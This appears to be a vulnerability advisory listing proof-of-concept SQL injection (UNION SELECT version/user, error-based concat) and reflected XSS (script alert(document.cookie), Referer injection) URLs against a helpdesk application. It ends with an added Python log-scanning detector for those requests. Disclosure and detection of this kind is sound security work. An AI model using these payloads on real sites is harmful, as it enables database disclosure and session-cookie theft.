SQL injection:

URIs

http://www.example.com/portal/kb.php?start=SQL_CODE_HERE
http://www.example.com/contract_add_service.php?contractid=1%20union%20%28select%20min%28@a:=1%29from%20%28select%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2B1%29%2%29%29%29%20+--+
http://www.example.com/edit_escalation_path.php?id=-1%20union%20select%201,version%28%29,user%28%29,4,5,6,7,8,9
http://www.example.com/holding_queue.php?unlock=%27SQL_CODE_HERE
http://www.example.com/holding_queue.php?lock=%27SQL_CODE_HERE
http://www.example.com/search.php?q=123&domain=incidents&start=SQL_CODE_HERE
http://www.example.com/transactions.php?sites[]=1%20union%20select%201,2,3,4,5,6,7,8,version%28%29,10,11,12,13,14,15,16%20+--+

Inputs:

Cross-site scripting:

URIs

http://www.example.com/contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/contract_add_service.php?contractid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/edit_backup_users.php?user=%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/edit_escalation_path.php?id=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/inbox.php?action=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/incident_add.php?action=findcontact&search_string=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/report_incidents_by_vendor.php?mode=1&startdate=%3Cscript%3Ealert%281%29;%3C/script%3E&enddate=%3Cscript%3Ealert%282%29;%3C/script%3E

Inputs:

GET /forgotpwd.php?userid=1&action=sendpwd HTTP/1.1
Referer: '
GET /billable_incidents.php?mode=approvalpage&output=html HTTP/1.1
Referer: '>

GET /transactions.php?display=html HTTP/1.1
Referer: '>

Cross-site request-forgery:

Input:
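
For defenders reviewing web-server logs, the following is an added detection example (not part of the original advisory) that flags requests hitting the script/parameter pairs and Referer-based requests listed above under SQL injection and Cross-site scripting. It assumes combined-format access logs and an application served from the web root; the names `WATCHED`, `REFERER_PATHS`, `classify` and `scan`, and the sample log lines, are constructed for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script path -> query parameters the advisory lists as injectable.
WATCHED = {
    "/portal/kb.php": {"start"}, "/search.php": {"start"},
    "/contract_add_service.php": {"contractid"},
    "/edit_escalation_path.php": {"id"},
    "/holding_queue.php": {"unlock", "lock"},
    "/transactions.php": {"sites[]"},
    "/contact_support.php": {"mode"}, "/inbox.php": {"action"},
    "/edit_backup_users.php": {"user"},
    "/incident_add.php": {"search_string"},
    "/report_incidents_by_vendor.php": {"startdate", "enddate"},
}
# Requests the advisory lists with a hostile Referer header.
REFERER_PATHS = {"/forgotpwd.php", "/billable_incidents.php", "/transactions.php"}

# Assumed log layout: "METHOD target HTTP/x" status bytes "referer" ...
LOG = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3} \S+ "(?P<referer>[^"]*)"')
SQLI = re.compile(r"\bunion\b.*\bselect\b|@@|\b(?:version|user|concat)\s*\(", re.I | re.S)
METACHAR = re.compile(r"[<>\"']")

def classify(value):
    """Label one URL-decoded value: 'sqli', 'metachar' or None."""
    if SQLI.search(value):
        return "sqli"
    return "metachar" if METACHAR.search(value) else None

def scan(line):
    """Return (path, field, kind) findings for one access-log line."""
    m = LOG.search(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    found = [(url.path, name, kind)
             for name, value in parse_qsl(url.query, keep_blank_values=True)
             if name in WATCHED.get(url.path, ()) and (kind := classify(value))]
    if url.path in REFERER_PATHS and METACHAR.search(m["referer"]):
        found.append((url.path, "Referer", "metachar"))
    return found

# Constructed sample log lines (192.0.2.0/24 is a documentation range).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /edit_escalation_path.php?id=-1%20union%20select%201,version%28%29 HTTP/1.1" 200 512 "-" "curl/8"',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /inbox.php?action=%3Cscript%3Ealert%281%29%3C/script%3E HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /transactions.php?display=html HTTP/1.1" 200 900 "\'>x" "Mozilla/5.0"',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /edit_escalation_path.php?id=7 HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
]
```

Parameter names are URL-decoded before the lookup, so `sites%5B%5D` is matched the same way as `sites[]`.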